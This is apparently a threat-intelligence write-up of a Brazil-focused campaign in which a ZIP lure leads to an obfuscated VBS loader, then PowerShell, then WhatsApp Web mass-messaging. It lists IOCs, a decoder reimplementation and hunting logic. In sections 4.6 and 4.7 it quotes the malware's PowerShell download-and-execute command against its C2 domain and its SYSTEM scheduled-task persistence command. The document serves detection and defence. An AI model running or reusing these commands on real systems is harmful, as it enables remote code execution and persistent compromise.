Brazil-Focused Multi-Stage Campaign: VBS → PowerShell → WhatsApp Web Automation
Created: October 13, 2025
Introduction
WhatsApp is not secure, whatever mass media tells you, and a ZIP file sent to you is not benign just because it arrives wrapped in affection. One click later, or a semblance of love later, and we are staring at a 13 MB VBScript pirouetting through email (IMAP), fallback domains, and a gated PowerShell payload that ultimately drives WhatsApp Web automation at scale. This is not how you should travel.
This story of the macabre walks through every step: what each script does, which network calls fire when, and what is dropped where (and where the wallet was left), so you can reproduce the detection logic and understand the operator’s playbook. More importantly, so that you are aware.
1) Case Timeline & Telemetry
processFilePath: C:\Windows\System32\wscript.exe
processCmd: "C:\Windows\System32\WScript.exe" "C:\Users\[REDACTED]\AppData\Local\Temp\e7ba5c50-2705-4d4e-b94e-8ff8cf7c95ea_Orcamento-202575878833.zip.5ea\-6ed49d55-ed3.vbs"
eventSubId: TELEMETRY_AMSI_EXECUTE
"TargetFilePath": C:\Users\[REDACTED]\Downloads\Orcamento-202575878833.zip,
"TargetFirstSeen": 2025-10-13T12:54:26.111Z,
"TargetLastSeen": 2025-10-13T12:54:26.111Z,
"Timezone": UTC-03:00,
"Url": hxxps://web.whatsapp[.]com/
On-Disk Sample & Hashes
Path: C:\Users\[REDACTED]\AppData\Local\Temp\...\-6ed49d55-ed3.vbs
Size: ~13 MB
Created: 2025-10-13 12:47:28
Modified: 2025-10-13 08:55:05
SHA1: 416768bbb9e2a882e0293a458a7b292888d3bc89
SHA256: aadb7abf4cd2fb62e3528bb4c57a51ac444ca51e27eac1d4c67f61462fe6c578
Additional sample:
SHA1: c1ed3d28af2953583d5d65b7faa54051d3552889
SHA256: 6048864be62ff1db5d0eb35d44e4fd6f84ae24b3e9ff1c1165b304451258c0be
MD5: 6bd1deb56e16cb21e22ca58d5752beb6
2) Infection Chain at a Glance
- User action: Opens a Portuguese-themed ZIP while web.whatsapp[.]com is active.
- Stage 0—VBS Loader: Massive Chr() blobs decode to plaintext; ExecuteGlobal runs Stage-2 VBS in memory.
- Stage 2—VBS Controller:
  - Locale check (PT-BR/PT-PT) and anti-analysis.
  - Configuration bootstrap via IMAP mailbox; else /data.php across fallback domains; else Pastebin raw.
  - Builds & launches PowerShell to fetch the next stage; optional self-delete.
- PowerShell stage: Fetches gated payload from miportuarios[.]com/sisti/. Related tooling automates WhatsApp Web (Selenium/ChromeDriver/WPPConnect), uploads contacts, honors server pause/resume.
3) Stage 0 VBS (Loader / Decryptor)
Goal: Build plaintext script in memory and execute it.
- Technique: Thousands of Chr(<digits>) concatenations create a pipe-delimited numeric stream.
- Decode: Each token is int-cast and adjusted by multiple XOR-derived subtractions.
- Execute: Decoded buffer → ExecuteGlobal → Stage-2 controller.
varX = CInt(token)
varX = (varX - (202 Xor 10)) Mod 256
varX = (varX - (178 Xor 159)) Mod 256
varX = (varX - (38 Xor 250)) Mod 256
varX = (varX - (234 Xor 37 )) Mod 256
decoded_char = Chr(varX) ' → appended to in-memory script
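An added analyst-side reimplementation of the Stage-0 decode loop above (example code, not the sample's own VBS): it pulls every Chr(<digits>) literal out of a loader fragment, rebuilds the pipe-delimited numeric stream, and applies the four XOR-derived subtractions. Assumptions: each step wraps as a non-negative modulo 256 (Python's %), and the encode helper and demo fragment are constructed here only to show the round trip.

```python
import re

# The four subtraction constants from the Stage-0 snippet: (202 Xor 10), (178 Xor 159), (38 Xor 250), (234 Xor 37).
SUBTRACTIONS = (202 ^ 10, 178 ^ 159, 38 ^ 250, 234 ^ 37)   # 192, 45, 220, 207

CHR_RE = re.compile(r"Chr\(\s*(\d+)\s*\)", re.IGNORECASE)


def rebuild_stream(vbs_fragment: str) -> str:
    """Concatenate every Chr(<digits>) literal, in order, into the pipe-delimited numeric stream."""
    return "".join(chr(int(n)) for n in CHR_RE.findall(vbs_fragment))


def decode_token(token: int) -> str:
    """Apply the loader's subtraction chain; each step wraps to 0..255 (assumption: non-negative modulo)."""
    value = token
    for k in SUBTRACTIONS:
        value = (value - k) % 256
    return chr(value)


def decode_stream(stream: str) -> str:
    """Split on '|' and turn each numeric token into one plaintext character."""
    return "".join(decode_token(int(t)) for t in stream.split("|") if t.strip().isdigit())


def decode_loader(vbs_fragment: str) -> str:
    """Full Stage-0 path: Chr() chain -> numeric stream -> Stage-2 plaintext."""
    return decode_stream(rebuild_stream(vbs_fragment))


def encode_for_demo(plaintext: str) -> str:
    """Constructed inverse (not from the sample): emit a Chr() chain whose decode yields plaintext."""
    shift = sum(SUBTRACTIONS) % 256          # the four subtractions collapse to a single shift of 152
    stream = "|".join(str((ord(c) + shift) % 256) for c in plaintext)
    return " & ".join(f"Chr({ord(ch)})" for ch in stream)


# Constructed Stage-2 excerpt standing in for the real controller text.
DEMO_PLAINTEXT = 'Set sh = CreateObject("WScript.Shell")'
DEMO_LOADER = "sCode = " + encode_for_demo(DEMO_PLAINTEXT)

if __name__ == "__main__":
    print(decode_loader(DEMO_LOADER))
```

On a real loader, feed the whole .vbs text to decode_loader; the regex ignores everything except the Chr() literals, so surrounding filler does not matter.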
4) Stage 2 VBS (Controller / Bootstrap)
Goal: Confirm locale, evade analysis, retrieve config, resolve next stage, persist.
4.1 Locale Gating
- Checks OSLanguage for 1046 (pt-BR) / 2070 (pt-PT).
- Registry fallback: HKCU\Control Panel\International\sLanguage begins with PT.
4.2 Anti-Analysis
Scans processes for tools such as x64dbg, Procmon, ProcessHacker; alters flow or exits if found.
4.3 Config Bootstrap — IMAP First
- Opens TLS IMAP to imap.terra.com.br:993.
- IMAP flow: LOGIN → SELECT INBOX → SEARCH SUBJECT "data" → FETCH BODY[TEXT].
- Parses body for SERVER_URL, BACKUP_URL, maybe POWERSHELL_URL.
4.4 Config Bootstrap — Fallback Domains
If IMAP fails or yields nothing usable, iterate /data.php across:
lefthandsuperstructures[.]com
clhttradinglimited[.]com
mazdafinancialsevrices[.]com
ricardasphotography[.]com
jornalistaaurelianoborgesmidia[.]com
cursosgratiss[.]com[.]br
intelligentopennetworkingawards[.]com
vinhomeshungyentheempires[.]com
wbdiamonds[.]com
pastebin[.]com/raw/SmCz4cp8
4.5 Public IP Probe
HTTP GET to api.ipify[.]org to record external address.
4.6 Next-Stage Launch (PowerShell)
Forces TLS 1.2, downloads PS1, executes in memory:
powershell.exe -ep bypass "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;
iex ((New-Object Net.WebClient).DownloadString('https://miportuarios[.]com/sisti/api.ps1'))"
4.7 Persistence & Cleanup
attrib.exe +h +s "C:\ProgramData\WindowsManager\"
schtasks.exe /create /tn "Windows Manager Services" /tr "wscript.exe 'C:\ProgramData\WindowsManager\WinManagers.vbs'" /sc onstart /ru SYSTEM /f
wscript.exe "C:\ProgramData\WindowsManager\WinManagers.vbs"
5) PowerShell Stage (Gated Payload & WhatsApp Automation)
Goal: Retrieve gated PS1 from miportuarios[.]com/sisti/ and operate via a PHP panel.
5.1 Gating Behavior
- Server may return tiny/empty responses unless the caller “feels right”.
- Lab capture often needs:
  - Seed cookies via a fallback /data.php call,
  - Accept-Language: pt-BR and a browser-like UA,
  - Referer pointing to the seeded domain.
5.2 Panel Endpoints
miportuarios[.]com/sisti/api.php (queue/commands)
miportuarios[.]com/sisti/config.php (live config)
miportuarios[.]com/sisti/log.php (status/logging)
miportuarios[.]com/sisti/contacts.php (contact uploads)
5.3 WhatsApp Web Automation (Related Sample Behavior)
- Sets up Selenium/ChromeDriver + WPPConnect; navigates to hxxps://web.whatsapp[.]com/.
- Copies Chrome profile to C:\temp\ChromeWpp to reuse session/cookies.
- Lists contacts; sends messages/ZIP lure; respects envio_ativo pause/resume.
6) Network Flows & Infrastructure (IOCs)
6.1 IMAP Bootstrap
imap.terra.com.br:993 (TLS)
DNS chain example: imap.terra.com.br → terramail-imap.trafficmanager.net → vip-imap-az.eastus2.cloudapp.azure.com
6.2 Fallback Config (/data.php) & Pastebin
Same set as listed under 4.4: the nine /data.php fallback domains plus the Pastebin raw URL.
6.3 Panel / Operational
miportuarios[.]com/sisti/api.php
miportuarios[.]com/sisti/config.php
miportuarios[.]com/sisti/log.php
miportuarios[.]com/sisti/contacts.php
6.4 Other
api.ipify[.]org
cld[.]pt/dl/.../Orcamento...zip
web.whatsapp[.]com
7) Host Artifacts & Persistence
- Directories/Files:
- C:\ProgramData\WindowsManager\WinManagers.vbs
- C:\temp\chromedriver.exe
- C:\temp\ChromeWpp\ (copied Chrome profile)
- Process Chains:
  - wscript.exe → powershell.exe with -ep Bypass, DownloadString, IEX
- Tasks:
- Windows Manager Services (OnStart, SYSTEM) launching WinManagers.vbs
8) Detection & Hunting Notes
- Look for:
  - wscript.exe → powershell.exe with in-memory download/execute.
  - Files: C:\ProgramData\WindowsManager\WinManagers.vbs, C:\temp\chromedriver.exe, C:\temp\ChromeWpp\.
  - Network: /data.php on listed domains; /sisti/* on miportuarios[.]com; IMAPS to imap.terra.com.br:993.
  - Gated payload heuristic: HTTP 200 with tiny bodies unless Referer/Accept-Language present.
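Added hunting logic for the host-side indicators in this section, run over constructed process-creation events shaped like the telemetry in section 1 (example code, not the page's or any vendor's rule set). The event fields parent/image/cmd are an assumption to map onto your EDR schema; the command lines are modelled on those shown in 4.6 and 4.7, and the benign fourth event is there to show the rules stay quiet on ordinary admin use.

```python
import re

# Constructed process-creation events (field names are an assumption; adapt to your EDR schema).
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "wscript.exe",
     "cmd": r'"C:\Windows\System32\WScript.exe" "C:\Users\u\AppData\Local\Temp\lure.zip.5ea\-6ed49d55-ed3.vbs"'},
    {"parent": "wscript.exe", "image": "powershell.exe",
     "cmd": 'powershell.exe -ep bypass "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;'
            "iex ((New-Object Net.WebClient).DownloadString('hxxps://miportuarios[.]com/sisti/api.ps1'))\""},
    {"parent": "wscript.exe", "image": "schtasks.exe",
     "cmd": r'schtasks.exe /create /tn "Windows Manager Services" /tr "wscript.exe '
            r"'C:\ProgramData\WindowsManager\WinManagers.vbs'"
            r'" /sc onstart /ru SYSTEM /f'},
    {"parent": "explorer.exe", "image": "powershell.exe",      # benign admin use: must not fire
     "cmd": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
]

PS_INMEMORY = re.compile(r"downloadstring|invoke-expression|\biex\b", re.I)
PS_BYPASS = re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I)
TASK_WSCRIPT_PROGRAMDATA = re.compile(r'/tr\s+"?wscript\.exe[^"]*\\programdata\\', re.I)
VBS_FROM_ZIP_TEMP = re.compile(r'\\temp\\.*\.zip[^\\]*\\[^"]*\.vbs', re.I)


def classify(event: dict) -> list:
    """Return the names of every hunting rule that fires for one process-creation event."""
    parent, image, cmd = event["parent"].lower(), event["image"].lower(), event["cmd"]
    low = cmd.lower()
    hits = []
    if image == "wscript.exe" and VBS_FROM_ZIP_TEMP.search(cmd):
        hits.append("vbs_run_from_zip_extract_in_temp")              # section 1: lure opened from the ZIP
    if image == "powershell.exe" and parent == "wscript.exe" and PS_INMEMORY.search(cmd):
        hits.append("wscript_spawns_powershell_inmemory")            # 4.6: download-and-IEX next stage
        if PS_BYPASS.search(cmd):
            hits.append("executionpolicy_bypass")
    if (image == "schtasks.exe" and "/sc onstart" in low and "/ru system" in low
            and TASK_WSCRIPT_PROGRAMDATA.search(cmd)):
        hits.append("onstart_system_task_runs_wscript_from_programdata")   # 4.7: persistence
    return hits


def hunt(events: list) -> dict:
    """Map event index -> fired rules, skipping events with no hits."""
    findings = {}
    for idx, event in enumerate(events):
        hits = classify(event)
        if hits:
            findings[idx] = hits
    return findings
```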
Conclusion
This is a Brazil-focused, multi-stage campaign that uses a heavily obfuscated VBS loader to fetch configuration via a hard-coded Terra IMAP mailbox and, failing that, a rotating set of /data.php domains (plus Pastebin). The loader spawns PowerShell to pull a gated payload from miportuarios[.]com/sisti/, which connects to a PHP panel (api.php, config.php, log.php, contacts.php). The operational goal is mass-messaging and contact harvesting via WhatsApp Web, driven by Selenium/ChromeDriver and the WPPConnect library. The tooling copies Chrome profile data, enabling session reuse and potential cookie/token exposure. As with most campaigns of this kind, this one lives behind Cloudflare.
Appendices (Downloads)
Appendix A: Stage-2 VBS Excerpts (TXT)
Appendix B: PowerShell Snippets (TXT)